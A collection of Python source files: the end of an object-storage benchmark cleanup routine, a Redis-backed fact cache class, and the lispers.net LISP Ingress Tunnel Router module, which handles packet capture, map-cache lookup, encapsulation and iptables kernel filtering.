vm_util.RunThreaded(lambda vm: CleanupVM(vm, service), vms)
# Only clean up bucket if we're not saving the objects for a later run
keep_bucket = (FLAGS.object_storage_objects_written_file_prefix is not None or
FLAGS.object_storage_dont_delete_bucket)
if not keep_bucket:
service.DeleteBucket(bucket_name)
service.CleanupService()
|
caching.py
|
import json
import logging
import threading
import redis
import time
LOG = logging.getLogger(__name__)
def bootstrap_cache(host='127.0.0.1', password=None):
pool = redis.ConnectionPool(host=host, password=password)
return redis.StrictRedis(connection_pool=pool)
def connect_to_cache():
import os
cache_host = os.environ['REDIS_HOST']
cache_password = os.environ.get('REDIS_PASSWORD', None)
return bootstrap_cache(cache_host, cache_password)
class FactCache(object):
IS_JSON = 'JSON::'
def __init__(self, redis_conn, prefix, timeout_seconds=3600, loader=None,
preload=False, debug=False):
self._redis = redis_conn
self._prefix = prefix
self.timeout_seconds = timeout_seconds
self._loader = loader or self.noop
self._load_op = None
self._loading_lock = threading.BoundedSemaphore()
self._debug = debug
if redis_conn and preload:
self.get('')
@property
def is_available(self):
return self._redis.ping()
@property
def is_loading(self):
acquired_lock = False
try:
acquired_lock = self._loading_lock.acquire(blocking=False)
return not acquired_lock or (self._is_load_op_alive())
finally:
if acquired_lock:
self._loading_lock.release()
def __setitem__(self, key, value):
self.set(key, value)
def set(self, key, value):
cache_key = self._compound_key(key)
value = self._pickle(value)
return self._redis.setex(cache_key, self.timeout_seconds, value)
def load(self, payload):
self._load(payload)
def get(self, key, blocking=False):
compound_key = self._compound_key(key)
found = self._redis.get(compound_key)
if found:
if self._debug:
LOG.info('Cache Hit [%s] for key [%s]', self._prefix, key)
return self._unpickle(found)
if self._debug:
LOG.info('Cache Miss [%s] for key [%s]', self._prefix, key)
found = self._locked_get(key)
if blocking:
self._wait_for_loading_op()
return self.get(key)
else:
return found
def __getitem__(self, item):
return self.get(item)
def _compound_key(self, key):
return self._prefix + str(key)
def _locked_get(self, key):
with self._loading_lock:
self._wait_for_loading_op()
# Try one more time to find the key in the cache
compound_key = self._compound_key(key)
found = self._redis.get(compound_key)
if found:
return self._unpickle(found)
# Load the data and send to the cache
payload = self._loader()
def _load_this():
self._load(payload)
named = 'FactCache_Loading[%s]' % self._prefix
self._load_op = threading.Thread(target=_load_this, name=named)
self._load_op.start()
# TODO figure out the bug here when payload does not include
# the key but it still ends up in the cache somehow
return payload.get(key, None)
def _wait_for_loading_op(self):
if self._is_load_op_alive():
while self._load_op.is_alive():
time.sleep(0.01) # 10ms
def _is_load_op_alive(self):
return self._load_op and self._load_op.is_alive()
def _load(self, payload):
for key in payload:
self.set(key, payload[key])
def _pickle(self, value):
if not isinstance(value, str):
value = self.IS_JSON + json.dumps(value)
return value
def _unpickle(self, found):
if isinstance(found, str) and found.startswith(self.IS_JSON):
found = json.loads(found[6:])
return found
@staticmethod
def noop():
return {}
|
lisp-itr.py
|
# -----------------------------------------------------------------------------
#
# Copyright 2013-2019 lispers.net - Dino Farinacci <[email protected]>
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
# -----------------------------------------------------------------------------
#
# lisp-itr.py
#
# This file performs LISP Ingress Tunnel Router (ITR) functionality.
#
# -----------------------------------------------------------------------------
import lisp
import lispconfig
import socket
import select
import threading
import pcappy
import time
import os
import commands
import struct
#------------------------------------------------------------------------------
#
# Global data structures relative to the lisp-itr process.
#
lisp_send_sockets = [None, None, None]
lisp_ipc_listen_socket = None
lisp_ipc_punt_socket = None
lisp_ephem_listen_socket = None
lisp_ephem_nat_socket = None
lisp_ephem_port = lisp.lisp_get_ephemeral_port()
lisp_ephem_nat_port = lisp.lisp_get_ephemeral_port()
lisp_raw_socket = None
lisp_raw_v6_socket = None
lisp_periodic_timer = None
lisp_itr_info_timer = None
#
# This is for testing sending from one local EID-prefix to another EID-prefix
# on the same system. Rather than natively forwarding a packet, the mapping
# system is used.
#
lisp_xtr_loopback = False
#
# Used to start pcap threads concurrently.
#
lisp_pcap_lock = threading.Lock()
#------------------------------------------------------------------------------
#
# lisp_itr_show_command
#
# Display state in an ITR.
#
def lisp_itr_show_command(parameter):
return(lispconfig.lisp_itr_rtr_show_command(parameter, "ITR", []))
#enddef
#
# lisp_itr_show_keys_command
#
# Call lispconfig.lisp_show_crypto_list().
#
def lisp_itr_show_keys_command(parameter):
return(lispconfig.lisp_show_crypto_list("ITR"))
#enddef
#
# lisp_itr_show_rloc_probe_command
#
# Display RLOC-probe list state in an ITR.
#
def lisp_itr_show_rloc_probe_command(parameter):
return(lispconfig.lisp_itr_rtr_show_rloc_probe_command("ITR"))
#enddef
#
# lisp_itr_process_timer
#
# This is the ITR's 60-second periodic timer routine. We typically use it
# to time-out map-cache entries. But the one case where we are acting as
# a L2-overlay ITR, we will send Map-Requests to retrieve the broadcast
# entry so we have the latest replication-list before we need it.
#
def lisp_itr_process_timer(lisp_sockets, lisp_ephem_port):
lisp.lisp_set_exception()
#
# Remove nonce entries from crypto-list.
#
for keys in lisp.lisp_crypto_keys_by_nonce.values():
for key in keys: del(key)
#endfor
lisp.lisp_crypto_keys_by_nonce = {}
#
# If doing L2-overlays, get map-cache entry from (0000-0000-0000/0,
# ffff-ffff-ffff/48).
#
if (lisp.lisp_l2_overlay):
afi = lisp.LISP_AFI_MAC
iid = lisp.lisp_default_iid
s = lisp.lisp_address(afi, "0000-0000-0000", 0, iid)
s.mask_len = 0
d = lisp.lisp_address(afi, "ffff-ffff-ffff", 48, iid)
lisp.lisp_send_map_request(lisp_sockets, lisp_ephem_port, s, d, None)
#endif
#
# Timeout Map-Cache entries.
#
lisp.lisp_timeout_map_cache(lisp.lisp_map_cache)
#
# Restart periodic timer.
#
lisp_periodic_timer = threading.Timer(60, lisp_itr_process_timer,
[lisp_sockets, lisp_ephem_port])
lisp_periodic_timer.start()
return
#enddef
#
# lisp_itr_timeout_dynamic_eids
#
# Check to see if dyanmic-EIDs have stop sending data. If so, remove the
# state and stop registering them.
#
def lisp_itr_timeout_dynamic_eids(lisp_socket):
lisp.lisp_set_exception()
now = lisp.lisp_get_timestamp()
for db in lisp.lisp_db_list:
if (db.dynamic_eid_configured() == False): continue
delete_list = []
for dyn_eid in db.dynamic_eids.values():
ts = dyn_eid.last_packet
if (ts == None): continue
if (ts + dyn_eid.timeout > now): continue
#
# Check hardware if dyn-EID has had packets SENT to. We want the
# opposite but this is all we get from Arista.
#
if (lisp.lisp_program_hardware):
prefix = dyn_eid.dynamic_eid.print_prefix_no_iid()
if (lisp.lisp_arista_is_alive(prefix)):
lisp.lprint(("Hardware indicates dynamic-EID {} " + \
"still active").format(lisp.green(prefix, False)))
continue
#endif
#endif
#
# Tell ETR process so it can register dynamic-EID.
#
eid_str = dyn_eid.dynamic_eid.print_address()
ipc = "learn%{}%None".format(eid_str)
ipc = lisp.lisp_command_ipc(ipc, "lisp-itr")
lisp.lisp_ipc(ipc, lisp_socket, "lisp-etr")
lisp.lprint("Dynamic-EID {}".format( \
lisp.bold(lisp.green(eid_str, False) + " activity timeout",
False)))
delete_list.append(eid_str)
#endfor
#
# Remove the timed out entries from db.dynamic_eids{}.
#
for eid_str in delete_list: db.dynamic_eids.pop(eid_str)
#endfor
#
# Restart periodic timer.
#
threading.Timer(lisp.LISP_DEFAULT_DYN_EID_TIMEOUT,
lisp_itr_timeout_dynamic_eids, [lisp_socket]).start()
return
#enddef
#
# lisp_get_active_interfaces
#
# Get interfaces that are plugged in. Including loopback interfaces.
#
# We need to test these 3 types of lines from "ifconfig" output:
#
# aten2 Link encap:Ethernet HWaddr 00:1F:A0:07:0C:04
# eth7: flags=4163<UP,BROADCAST,RUNNING,MULTICAST> mtu 1500
# en0: flags=8863<UP,BROADCAST,SMART,RUNNING,SIMPLEX,MULTICAST> mtu 1500
#
def lisp_get_active_interfaces():
if (lisp.lisp_is_macos()): return(["en0", "en1", "lo0"])
#
# Linux distributions have different ifconfig output format.
#
gs = "Link encap"
interfaces = commands.getoutput("ifconfig | egrep '{}'".format(gs))
if (interfaces == ""):
gs = ": flags="
interfaces = commands.getoutput("ifconfig | egrep '{}'".format(gs))
#endif
interfaces = interfaces.split("\n")
return_interfaces = []
for interface in interfaces:
ifname = interface.split(gs)[0].replace(" ", "")
return_interfaces.append(ifname)
#endfor
return(return_interfaces)
#enddef
#
# lisp_itr_startup
#
# Intialize this LISP ITR process. This function returns no values.
#
def lisp_itr_startup():
global lisp_send_sockets
global lisp_ipc_listen_socket
global lisp_ipc_punt_socket
global lisp_ephem_listen_socket
global lisp_ephem_nat_socket
global lisp_raw_socket, lisp_raw_v6_socket
lisp.lisp_i_am("itr")
lisp.lisp_set_exception()
lisp.lisp_print_banner("ITR starting up")
#
# Get local address for source RLOC for encapsulation.
#
lisp.lisp_get_local_interfaces()
lisp.lisp_get_local_macs()
if (lisp.lisp_get_local_addresses() == False): return(False)
#
# Open send socket.
#
lisp_send_sockets[0] = lisp.lisp_open_send_socket("", lisp.LISP_AFI_IPV4)
lisp_send_sockets[1] = lisp.lisp_open_send_socket("", lisp.LISP_AFI_IPV6)
lisp_ipc_listen_socket = lisp.lisp_open_listen_socket("", "lisp-itr")
lisp_ipc_punt_socket = lisp.lisp_open_listen_socket("", "lispers.net-itr")
lisp_send_sockets[2] = lisp_ipc_listen_socket
address = "0.0.0.0" if lisp.lisp_is_raspbian() else "0::0"
lisp_ephem_listen_socket = lisp.lisp_open_listen_socket(address,
str(lisp_ephem_port))
#
# Used on for listening for Info-Replies for NAT-traversal support.
#
lisp_ephem_nat_socket = lisp.lisp_open_listen_socket("0.0.0.0",
str(lisp_ephem_nat_port))
#
# Open up raw socket so we can send with IP headers after decapsulation.
#
lisp_raw_socket = socket.socket(socket.AF_INET, socket.SOCK_RAW,
socket.IPPROTO_RAW)
lisp_raw_socket.setsockopt(socket.SOL_IP, socket.IP_HDRINCL, 1)
if (lisp.lisp_is_raspbian() == False):
lisp_raw_v6_socket = socket.socket(socket.AF_INET6, socket.SOCK_RAW,
socket.IPPROTO_UDP)
#endif
#
# This is used by the ITR to send RTR status change information to the
# ETR. Since RLOC-probing runs inside the lisp library, when state changes
# occur, an IPC will have to be sent from the timer thread. This is the
# only use-case for lisp.lisp_ipc_socket.
#
lisp.lisp_ipc_socket = lisp_ipc_listen_socket
#
# Start map-cache timeout timer.
#
threading.Thread(target=lisp_itr_get_capture_info).start()
#
# Load map-cache from checkpoint file before we start writing to it.
#
lisp.lisp_load_checkpoint()
#
# Should we load-split pings?
#
lisp.lisp_load_split_pings = (os.getenv("LISP_LOAD_SPLIT_PINGS") != None)
#
# Start map-cache timeout timer.
#
lisp_periodic_timer = threading.Timer(60, lisp_itr_process_timer,
[lisp_send_sockets, lisp_ephem_port])
lisp_periodic_timer.start()
#
# Start dynamic-EID timeout timer.
#
threading.Timer(lisp.LISP_DEFAULT_DYN_EID_TIMEOUT,
lisp_itr_timeout_dynamic_eids, [lisp_ipc_listen_socket]).start()
return(True)
#enddef
#
# lisp_itr_count_eid_prefixes
#
# Cound the number of "prefix" sub-commands inside of each "lisp database-
# mapping" command.
#
def lisp_itr_count_eid_prefixes():
f = open("./lisp.config", "r")
within = False
count = 0
for line in f:
if (line == "lisp database-mapping {\n"): within = True
if (line == "}\n"): within = False
if (within == False): continue
if (line[0] == " " and line.find("prefix {") != -1): count += 1
#endif
f.close()
return(count)
#enddef
#
# lisp_itr_get_local_eid_prefixes
#
# Check the number of "lisp database-mapping" commands we will process. Wait
# for them to be processed and only return when all are processed.
#
# Return array of static EID-prefixes and an array of dynamic EID-prefixes.
#
def lisp_itr_get_local_eid_prefixes():
#
# Count the number of "prefix" sub-commands within a "lisp database-
# mapping" command clause in the lisp.config file.
#
count = lisp_itr_count_eid_prefixes()
#
# Does user want us to wait longer than a second to check to see if
# commands are done. If the CPU is going to be busy during startup, the
# wait-time should be made longer..
#
wait_time = os.getenv("LISP_ITR_WAIT_TIME")
wait_time = 1 if (wait_time == None) else int(wait_time)
#
# Wait for database-mapping commands to execute. We need to retrieve
# EID-prefixes we need to listen on.
#
while (count != len(lisp.lisp_db_list)):
lisp.lprint(("Waiting {} second(s) for {} database-mapping EID-" + \
"prefixes, {} processed so far ...").format(wait_time, count,
len(lisp.lisp_db_list)))
time.sleep(wait_time)
#endwhile
#
# Return each IPv4, IPv6, or MAC EIDs. These are the ones we need to
# pass to pcap.
#
sources = []
dyn_eids = []
for db in lisp.lisp_db_list:
if (db.eid.is_ipv4() or db.eid.is_ipv6() or db.eid.is_mac()):
eid_str = db.eid.print_prefix_no_iid()
if (db.dynamic_eid_configured()): dyn_eids.append(eid_str)
sources.append(eid_str)
#endif
#endfor
return(sources, dyn_eids)
#enddef
#
# lisp_itr_get_capture_info
#
# Thead to wait for database-mapping commands to finish processing so we can
# get local EID-prefixes to be source filters for packet capture.
#
def lisp_itr_get_capture_info():
global lisp_pcap_lock
lisp.lisp_set_exception()
#
# Wait for database-mapping commands to execute. We need to retrieve
# EID-prefixes we need to listen on.
#
sources, dyn_eids = lisp_itr_get_local_eid_prefixes()
#
# If "ipc-data-plane = yes" is configured, we do not need to do any
# data-plane forwarding. There is another module running with the
# lispers.net control-plane that is doing data-plane forwarding. We'll
# get punts via the lispers.net-itr named socket. But we do have to
# packet capture RLOC-probe replies. Also capture multicast Map-Register
# messages for LISP-Decent.
#
cp_pfilter = None
if (lisp.lisp_ipc_data_plane):
lisp.lprint(lisp.bold("Data-plane packet capture disabled", False))
cp_pfilter = "(udp src port 4342 and ip[28] == 0x28)" + \
" or (ip[16] >= 224 and ip[16] < 240 and (ip[28] & 0xf0) == 0x30)"
lisp.lprint("Control-plane capture: '{}'".format(cp_pfilter))
else:
lisp.lprint("Capturing packets for source-EIDs {}".format( \
lisp.green(str(sources), False)))
#endif
if (lisp.lisp_pitr): lisp.lprint("Configured for PITR functionality")
#
# We want the kernel to handle any packets with source AND destination
# that matches any EID-prefixes for the site. Any other case, we want
# the pcap filters to get the packet to this lisp-itr process.
#
l2_overlay = lisp.lisp_l2_overlay
if (l2_overlay == False):
if (lisp.lisp_is_linux()): lisp_itr_kernel_filter(sources, dyn_eids)
#endif
#
# Build packet capture filter so we get packets for configured source EID-
# prefixes.
#
if (cp_pfilter == None):
if (lisp.lisp_pitr):
pfilter = lisp_itr_build_pcap_filter(sources, [], False, True)
else:
pfilter = lisp_itr_build_pcap_filter(sources, dyn_eids, l2_overlay,
False)
#endif
else:
pfilter = cp_pfilter
#endif
#
# User can select which interfaces to pcap on.
#
interfaces = lisp_get_active_interfaces()
pcap_list = os.getenv("LISP_PCAP_LIST")
if (pcap_list == None):
us = ""
rloc_interfaces = []
else:
eid_interfaces = list(set(pcap_list.split()) & set(interfaces))
rloc_interfaces = list(set(pcap_list.split()) ^ set(interfaces))
us = "user-selected "
lisp.lprint("User pcap-list: {}, active-interfaces: {}".format( \
pcap_list, interfaces))
interfaces = eid_interfaces
#endif
#
# Start a pcap thread so we can receive packets from applications on this
# system. But make sure the device is up on A10 devices. If ethernet MAC
# capturing, do not listen on non ethernet interfaces.
#
mac_capturing = (pfilter.find("ether host") != -1)
for device in interfaces:
if (device in ["lo", "lispers.net"] and mac_capturing):
lisp.lprint(("Capturing suppressed on interface {}, " + \
"MAC filters configured").format(device))
continue
#endif
args = [device, pfilter, lisp_pcap_lock]
lisp.lprint("Capturing packets on {}interface {}".format(us, device))
threading.Thread(target=lisp_itr_pcap_thread, args=args).start()
#endfor
if (cp_pfilter): return
#
# Start a pcap thread so we can receive RLOC-probe Map-Replies packets on
# RLOC interfaces. This is only called when LISP_PCAP_LIST is set.
#
probe_pfilter = "(udp src port 4342 and ip[28] == 0x28)"
for device in rloc_interfaces:
args = [device, probe_pfilter, lisp_pcap_lock]
lisp.lprint("Capture RLOC-probe replies on RLOC interface {}".format( \
device))
threading.Thread(target=lisp_itr_pcap_thread, args=args).start()
#endfor
return
#enddef
#
# lisp_itr_shutdown
#
# Shut down this process.
#
def lisp_itr_shutdown():
#
# Cancel periodic Info timer threads.
#
if (lisp_itr_info_timer): lisp_itr_info_timer.cancel()
#
# Close sockets.
#
lisp.lisp_close_socket(lisp_send_sockets[0], "")
lisp.lisp_close_socket(lisp_send_sockets[1], "")
lisp.lisp_close_socket(lisp_ephem_listen_socket, "")
lisp.lisp_close_socket(lisp_ephem_nat_socket, "")
lisp.lisp_close_socket(lisp_ipc_listen_socket, "lisp-itr")
lisp.lisp_close_socket(lisp_ipc_punt_socket, "lispers.net-itr")
return
#enddef
#
# lisp_itr_data_plane
#
# Do map-cache lookup and encapsulate packet.
#
def lisp_itr_data_plane(packet, device, input_interface, macs, my_sa):
global lisp_send_sockets
global lisp_ephem_port
global lisp_raw_socket, lisp_raw_v6_socket
global lisp_ipc_listen_socket
#
# Check RLOC-probe Map-Reply. We need to grab the TTL from IP header.
#
orig_packet = packet
packet, source, port, ttl = lisp.lisp_is_rloc_probe(packet, 1)
if (orig_packet != packet):
if (source == None): return
lisp.lisp_parse_packet(lisp_send_sockets, packet, source, port, ttl)
return
#endif
packet = lisp.lisp_packet(packet)
if (packet.decode(False, None, None) == None): return
#
# For locally source packets from this system, the MAC address may
# be the default router. Check source to see if assigned to this system,
# and if so, accept on interface "device".
#
if (my_sa): input_interface = device
#
# Get instance-ID for incoming interface.
#
source_eid = packet.inner_source
iid = lisp.lisp_get_interface_instance_id(input_interface, source_eid)
packet.inner_dest.instance_id = iid
packet.inner_source.instance_id = iid
#
# Print some useful header fields and strip outer headers..
#
if (macs != ""): macs = ", MACs: " + macs + ","
packet.print_packet("Receive {}{}".format(device, macs), False)
#
# Drop packet if input interface not found based on MAC address used.
#
if (device != input_interface and device != "lispers.net"):
lisp.dprint("Not our MAC address on interface {}, pcap interface {}". \
format(input_interface, device))
return
#endif
lisp_decent = lisp.lisp_decent_push_configured
if (lisp_decent):
multicast = packet.inner_dest.is_multicast_address()
local = packet.inner_source.is_local()
lisp_decent = (local and multicast)
#endif
if (lisp_decent == False):
#
# Only forward packets from source-EIDs.
#
db = lisp.lisp_db_for_lookups.lookup_cache(packet.inner_source, False)
if (db == None):
lisp.dprint("Packet received from non-EID source")
return
#endif
#
# Check to see if we are doing dynamic-EID discovery.
#
if (db.dynamic_eid_configured()):
i = lisp.lisp_allow_dynamic_eid(input_interface,
packet.inner_source)
if (i):
lisp.lisp_itr_discover_eid(db, packet.inner_source,
input_interface, i, lisp_ipc_listen_socket)
else:
e = lisp.green(packet.inner_source.print_address(), False)
lisp.dprint("Disallow dynamic-EID {} on interface {}".format(e,
input_interface))
return
#endif
#endif
if (packet.inner_source.is_local() and
packet.udp_dport == lisp.LISP_CTRL_PORT): return
#endif
#
# Do input processing for currently supported packet types..
#
if (packet.inner_version == 4):
igmp, packet.packet = lisp.lisp_ipv4_input(packet.packet)
if (packet.packet == None): return
packet.inner_ttl -= 1
elif (packet.inner_version == 6):
packet.packet = lisp.lisp_ipv6_input(packet)
if (packet.packet == None): return
packet.inner_ttl -= 1
else:
packet.packet = lisp.lisp_mac_input(packet.packet)
if (packet.packet == None): return
packet.encap_port = lisp.LISP_L2_DATA_PORT
#endif
#
# First check if destination is to any local EID-prefixes from database-
# mapping commands. In this case, we need to natively forward.
#
if (lisp_xtr_loopback == False):
db = lisp.lisp_db_for_lookups.lookup_cache(packet.inner_dest, False)
if (db and db.dynamic_eid_configured == False):
lisp.dprint(("Packet destined to local EID-prefix {}, " + \
"natively forwarding").format(db.print_eid_tuple()))
packet.send_packet(lisp_raw_socket, packet.inner_dest)
return
#endif
#endif
#
# Do map-cache lookup.
#
mc = lisp.lisp_map_cache_lookup(packet.inner_source, packet.inner_dest)
if (mc): mc.add_recent_source(packet.inner_source)
#
# If "secondary-iid" is configured, we want to check the secondary
# map-cache if a lookup miss occured in the default IID for this source
# EID-prefix. If destination EID found in secondary map-cache, use it.
# Otherwise, send Map-Request for EID in default IID.
#
secondary_iid = db.secondary_iid if (db != None) else None
if (secondary_iid and mc and mc.action == lisp.LISP_NATIVE_FORWARD_ACTION):
dest_eid = packet.inner_dest
dest_eid.instance_id = secondary_iid
mc = lisp.lisp_map_cache_lookup(packet.inner_source, dest_eid)
if (mc): mc.add_recent_source(packet.inner_source)
#endif
#
# Map-cache lookup miss.
#
if (mc == None or mc.action == lisp.LISP_SEND_MAP_REQUEST_ACTION):
if (lisp.lisp_rate_limit_map_request(packet.inner_source,
packet.inner_dest)): return
lisp.lisp_send_map_request(lisp_send_sockets, lisp_ephem_port,
packet.inner_source, packet.inner_dest, None)
if (packet.is_trace()):
lisp.lisp_trace_append(packet, reason="map-cache miss")
#endif
return
#endif
#
# Send Map-Request to see if there is a RLOC change or to refresh an
# entry that is about to time out.
#
if (mc and mc.is_active() and mc.has_ttl_elapsed()):
lisp.lprint("Refresh map-cache entry {}".format( \
lisp.green(mc.print_eid_tuple(), False)))
lisp.lisp_send_map_request(lisp_send_sockets, lisp_ephem_port,
packet.inner_source, packet.inner_dest, None)
#endif
#
# Update stats for entry. Stats per RLOC is done in lisp_mapping.select_
# rloc().
#
mc.stats.increment(len(packet.packet))
#
# Encapsulate, native forward, or encapsulate-and-replciate packet.
#
dest_rloc, dest_port, nonce, action, rle, rloc_entry = \
mc.select_rloc(packet, lisp_ipc_listen_socket)
if (dest_rloc == None and rle == None):
if (action == lisp.LISP_NATIVE_FORWARD_ACTION):
lisp.dprint("Natively forwarding")
packet.send_packet(lisp_raw_socket, packet.inner_dest)
if (packet.is_trace()):
lisp.lisp_trace_append(packet, reason="not an EID")
#endif
return
#endif
r = "No reachable RLOCs found"
lisp.dprint(r)
if (packet.is_trace()): lisp.lisp_trace_append(packet, reason=r)
return
#endif
if (dest_rloc and dest_rloc.is_null()):
r = "Drop action RLOC found"
lisp.dprint(r)
if (packet.is_trace()): lisp.lisp_trace_append(packet, reason=r)
return
#endif
#
# Setup outer header for either unicast or multicast transmission..
#
packet.outer_tos = packet.inner_tos
packet.outer_ttl = 32 if (igmp) else packet.inner_ttl
#
# Do unicast encapsulation.
#
if (dest_rloc):
packet.outer_dest.copy_address(dest_rloc)
version = packet.outer_dest.afi_to_version()
packet.outer_version = version
source_rloc = lisp.lisp_myrlocs[0] if (version == 4) else \
lisp.lisp_myrlocs[1]
packet.outer_source.copy_address(source_rloc)
if (packet.is_trace()):
if (lisp.lisp_trace_append(packet, rloc_entry=rloc_entry) \
== False): return
#endif
#
# Encode new LISP, UDP, and outer header.
#
if (packet.encode(nonce) == None): return
if (len(packet.packet) <= 1500): packet.print_packet("Send", True)
#
# Send out on raw socket.
#
raw_socket = lisp_raw_v6_socket if version == 6 else lisp_raw_socket
packet.send_packet(raw_socket, packet.outer_dest)
elif (rle):
#
# Do replication of RLE is returned. Since we are an ITR, replicate to
# level-0 RTRs (or ETRs) only (or first-level boxes only)..
#
level = rle.rle_nodes[0].level
orig_len = len(packet.packet)
for node in rle.rle_forwarding_list:
if (node.level != level): return
packet.outer_dest.copy_address(node.address)
if (lisp_decent): packet.inner_dest.instance_id = 0xffffff
version = packet.outer_dest.afi_to_version()
packet.outer_version = version
source_rloc = lisp.lisp_myrlocs[0] if (version == 4) else \
lisp.lisp_myrlocs[1]
packet.outer_source.copy_address(source_rloc)
if (packet.is_trace()):
if (lisp.lisp_trace_append(packet) == False): return
#endif
if (packet.encode(None) == None): return
#
# Replicate out on raw socket.
#
packet.print_packet("Replicate-to-L{}".format(node.level), True)
packet.send_packet(lisp_raw_socket, packet.outer_dest)
#
# We need to strip the encapsulation header so we can add a new
# one for the next replication.
#
strip_len = len(packet.packet) - orig_len
packet.packet = packet.packet[strip_len::]
#endfor
#endif
#
# Don't need packet structure anymore.
#
del(packet)
return
#enddef
#
# lisp_itr_pcap_process_packet
#
# Receive LISP encapsulated packet from pcap.loop().
#
def lisp_itr_pcap_process_packet(device, not_used, packet):
offset = 4 if device == "lo0" else 0 if device == "lispers.net" else 14
if (lisp.lisp_frame_logging):
title = lisp.bold("Received frame on interface '{}'".format(device),
False)
frame = lisp.lisp_format_packet(packet[0:64])
lisp.lprint("{}: {}".format(title, frame))
#endif
#
# Get input interface based on source MAC address.
#
macs = ""
my_sa = False
interface = device
if (offset == 14):
interfaces, sa, da, my_sa = lisp.lisp_get_input_interface(packet)
interface = device if (device in interfaces) else interfaces[0]
macs = lisp.lisp_format_macs(sa, da)
if (interface.find("vlan") != -1): offset +=4
#
# If destination MAC address is multicast, set my_sa. Examine low-order
# bit of first byte by grabbing the second nibble and testing low-order
# bit after converting to integer.
#
if (int(da[1], 16) & 1): my_sa = True
#endif
#
# Check for VLAN encapsulation.
#
if (offset != 0):
ethertype = struct.unpack("H", packet[offset-2:offset])[0]
ethertype = socket.ntohs(ethertype)
if (ethertype == 0x8100):
vlan = struct.unpack("I", packet[offset:offset+4])[0]
vlan = socket.ntohl(vlan)
interface = "vlan" + str(vlan >> 16)
offset += 4
elif (ethertype == 0x806):
lisp.dprint("Dropping ARP packets, host should have default route")
return
#endif
#endif
if (lisp.lisp_l2_overlay): offset = 0
lisp_itr_data_plane(packet[offset::], device, interface, macs, my_sa)
return
#enddef
#
# lisp_itr_kernel_filter
#
# Supplied 'sources' array are the EID-prefixes we want the kernel to drop
# packets for. We will use iptables for Linux and ipfw for MacOS.
#
# We need this address combination support (notation S -> D):
#
# site-EID -> remote-EID processed by ITR
# site-EID -> non-EID processed by ITR
# site-EID -> site-EID processed by kernel
# non-EID -> non-EID processed by kernel
# non-EID -> remote-EID processed by kernel
# non-EID -> site-EID processed by kernel
#
# The pcap filters reflect the ITR processing combos and can be found in
# lisp_itr_build_pcap_filter(). This routine programs iptables to do the
# kernel processing combos.
#
# (1) iptables -t raw -A lisp -j ACCEPT -d <special-addresses>
# (2) iptables -t raw -A lisp -j ACCEPT -d <local-address> ...
# (3) iptables -t raw -A lisp -j ACCEPT -s <site-eid> -d <site-eid> ...
# (4) iptables -t raw -A lisp -j DROP -s <site-eid> ...
#
# (1) and (2), we want kernel to route packets. This allows loopback and
# multicast to be processed by kernel.
#
# For (3), we want the kernel to do local routing of packets inside of a site
# in this ITR.
#
# For (4), we want kernel to not touch any packets sourced from locally
# configured EIDs. That is each EID-prefix from a "lisp database-mapping"
# command. Because those EID-prefixes are pcap'ed and process by the lisp-itr
# process.
#
def lisp_itr_kernel_filter(sources, dyn_eids):
if (os.getenv("LISP_NO_IPTABLES") != None):
lisp.lprint("User selected to suppress installing iptables rules")
return
#endif
os.system("sudo iptables -t raw -N lisp")
os.system("sudo iptables -t raw -A PREROUTING -j lisp")
os.system("sudo ip6tables -t raw -N lisp")
os.system("sudo ip6tables -t raw -A PREROUTING -j lisp")
#
# Have kernel process packets for local addresses when sourced from site
# EIDs. We do not want the lisp-itr process to process such packets.
# We want the kernel to deliver packets to and from local applications.
# And we want the kernel to forward decapsulated packets out interfaces
# leading the EIDs.
#
add = "sudo ip{}tables -t raw -A lisp -j ACCEPT -d {}"
addr_set = ["127.0.0.1", "::1", "224.0.0.0/4 -p igmp", "ff00::/8",
"fe80::/16"]
addr_set += sources + lisp.lisp_get_all_addresses()
for addr in addr_set:
if (lisp.lisp_is_mac_string(addr)): continue
six = "" if addr.find(":") == -1 else "6"
os.system(add.format(six, addr))
#endfor
#
# When source and destination addresses are EIDs for this LISP site,
# we want the kernel to do local routing. But as a PITR, we don't want
# the kernel to route everything (EID-prefix 0.0.0.0/0) or we can't have
# this process encapsulate for any source address to a destination EID.
#
if (lisp.lisp_pitr == False):
add = "sudo ip{}tables -t raw -A lisp -j ACCEPT -s {} -d {}"
check = "sudo ip{}tables -t raw -C lisp -j ACCEPT -s {} -d {}"
for source in sources:
if (lisp.lisp_is_mac_string(source)): continue
if (source in dyn_eids): continue
six = "" if source.find(":") == -1 else "6"
for s in sources:
if (lisp.lisp_is_mac_string(s)): continue
if (s in dyn_eids): continue
if (s.find(".") != -1 and source.find(".") == -1): continue
if (s.find(":") != -1 and source.find(":") == -1): continue
if (commands.getoutput(check.format(six, source, s)) == ""):
continue
#endif
os.system(add.format(six, source, s))
#endfor
#endfor
#endif
#
# Now put in drop rules for each "lisp database-mapping" EID-prefix.
#
drop = "sudo ip{}tables -t raw -A lisp -j DROP -s {}"
for source in sources:
if (lisp.lisp_is_mac_string(source)): continue
six = "" if source.find(":") == -1 else "6"
os.system(drop.format(six, source))
#endif
#
# Print out rules we just configured.
#
rules = commands.getoutput("sudo iptables -t raw -S lisp").split("\n")
rules += commands.getoutput("sudo ip6tables -t raw -S lisp").split("\n")
lisp.lprint("Using kernel filters: {}".format(rules))
#
# Check if we need to put in a iptables rule workaround for the virtio TCP
# checksum corruption problem for KVM guest OSes. Check environmnt
# variable LISP_VIRTIO_BUG.
#
# Note a debian host system that runs docker will need the following
# command so ip6tables works inside of the docker container:
#
# sudo modprobe ip6table_filter
#
if (os.getenv("LISP_VIRTIO_BUG") != None):
c = ("sudo iptables -A POSTROUTING -t mangle -p tcp -j " + \
"CHECKSUM --checksum-fill; ")
c += ("sudo iptables -A POSTROUTING -t mangle -p udp -j " + \
"CHECKSUM --checksum-fill; ")
c += ("sudo ip6tables -A POSTROUTING -t mangle -p tcp -j " + \
"CHECKSUM --checksum-fill; ")
c += ("sudo ip6tables -A POSTROUTING -t mangle -p udp -j " + \
"CHECKSUM --checksum-fill")
os.system(c)
virtio = lisp.bold("virtio", False)
lisp.lprint("{} bug workaround, configure '{}'".format(virtio, c))
#endif
return
#enddef
#
# lisp_itr_build_pcap_filter
#
# Build pcap filter and return string to caller.
#
